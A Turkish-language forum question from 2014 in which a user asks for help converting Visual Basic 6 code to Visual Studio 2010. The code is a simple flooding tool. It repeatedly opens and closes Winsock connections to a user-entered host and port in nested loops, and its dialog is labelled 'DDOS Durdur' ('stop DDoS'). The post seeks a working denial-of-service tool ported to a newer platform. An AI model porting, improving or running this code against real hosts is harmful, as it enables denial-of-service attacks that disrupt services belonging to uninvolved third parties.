none
VB 6 Visual Studio 2010 RRS feed

 • Soru

 • Arkadaşlar elimde visual basic 6 ile ilgili kodlar var bunu visual studio 2010 çevirmek istiyorum. yardımcı oalbılrmsnz?


  Dim Wiederholen
  Dim Anfragen
  
  Public Sub Command1_Click()
  On Error Resume Next
  For Wiederholen = 0 To Text3.Text - 1
  For Anfragen = 0 To Text2.Text - 1
  Winsock1.Close
  Winsock1.Connect Text1.Text, Text4.Text
  Next
  Next
  End Sub
  
  Private Sub Command2_Click()
  Me.Hide
  End Sub
  
  Private Sub Command3_Click()
  On Error Resume Next
  MsgBox "Durdurmakmı İstiyorsunuz ? ", vbYesNo, "DDOS Durdur ! "
  Me.Hide
  End Sub

  25 Nisan 2014 Cuma 13:48